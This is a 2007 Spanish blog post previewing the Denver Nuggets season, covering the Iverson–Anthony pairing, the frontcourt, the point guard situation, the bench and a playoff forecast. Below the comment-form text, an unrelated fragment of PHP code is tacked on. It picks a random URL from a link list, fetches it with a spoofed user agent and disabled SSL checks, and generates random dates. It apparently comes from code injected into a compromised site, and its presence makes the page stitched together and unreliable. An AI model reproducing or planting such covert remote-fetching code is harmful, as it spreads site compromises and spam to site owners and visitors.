Denver Nuggets: ¿1 + 1 > 2?

16 de October de 2007 por txusma

A mediados de la temporada pasada uno de los mejores anotadores de todos los tiempos llegaba a Denver. Muchas dudas se cernieron sobre el traspaso porque nadie sabía el impacto que podía tener en el equipo el juego de Allen Iverson y cómo se compenetraría con la figura indiscutible hasta el momento, Carmelo Anthony. Además, abandonaba la franquicia un gran base como Andre Miller, dejando el vacío más absoluto en esa posición. Pero, después de un inicio dubitativo, la máquina comenzó a carburar y los Nuggets se clasificaron para los Playoffs al acabar la temporada regular ganando 16 de sus últimos 22 partidos.

Este año Denver cuenta desde el inicio con la mejor pareja ofensiva de la liga, lo que habrá permitido trabajar sistemas, confeccionar jugadas y ajustar roles, eliminando la sensación de improvisación que en ocasiones sobrevolaba la temporada pasada el Pepsi Center. Iverson y Anthony deberán repartirse tiros y responsabilidades y aprovechar los espacios que cree el otro. De su relación y compenetración depende el éxito de estos Nuggets.

A su lado, el mejor defensor del año pasado, Marcus Camby, seguirá haciendo su oscuro trabajo, peleándose por cada rebote que escupan los aros e intentando taponar cada tiro rival. Temporada tras temporada, Camby, de 33 años, cierra la boca a aquellos que auguran su declive y sigue resultando vital en el juego interior de Denver. Si las lesiones le respetan este año no ha de ser diferente. Junto a él, en la zona continuará Nenê Hilario. El pívot brasileño cuajó una sensacional campaña a pesar de empezar a medio gas por culpa de una lesión de rodilla que lo tuvo parado el año anterior. Esta temporada ha de refrendar su recuperación, aumentar sus promedios anotadores y reboteadores y consolidarse en la zona junto a Camby.

La posición de base es la que presenta a priori más dudas. Steve Blake, base titular desde su llegada a mediados de la temporada pasada, ha abandonado el barco destino Portland. Para sustituirlo este verano ha llegado al equipo Chucky Atkins, que jugó junto a Gasol el año pasado y realizó una buena temporada. Seguramente será el base titular del equipo y el que más minuto dispute en esa posición. Su mayor competidor será… Allen Iverson. En Philadelphia ya disputaba muchos minutos en la posición de base y promedió más de 7 asistencias por partido las últimas 3 temporadas y es más que posible que se alterne con Atkins en esa posición. Esto dará minutos a J.R. Smith, un jugador que sabe aprovechar desde la línea de 3 los espacios creados por sus compañeros, como atestigua su récord de 37 puntos y 7 triples en un partido.

En el banco esperará Kenyon Martin. Después de una temporada y media sin jugar, ‘Bruto’ Martin vuelve con el único objetivo de coger confianza y volver a sentirse jugador de equipo. El equipo técnico ya ha avisado de que lo cuidará y mimará incrementando de manera progresiva su participación en los partidos. Si sus rodillas aguantan se convertirá en el recambio ideal para Camby y Nenê, y formará junto a ellos el juego interior más ‘cristal de bohemia’ de la NBA. Aparte del número 1 del draft del 2000, hay q destacar en el banco a Linas Kleiza, que tras un buen europeo aspira a incrementar sus minutos de juego; Yakhouba Diawara, que fue titular en algunos partidos de la temporada pasada; Steven Hunter, Eduardo Nájera y Von Wafer, que está dejando unas muy buenas impresiones en los partidos de pretemporada. Parece un banquillo algo corto para las aspiraciones de Denver, que no son otras que el anillo.

Quinteto: Atkins, Iverson, Anthony, Nenê y Camby
Sexto: J.R. Smith

Pronóstico: 1ª ronda de Playoffs

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>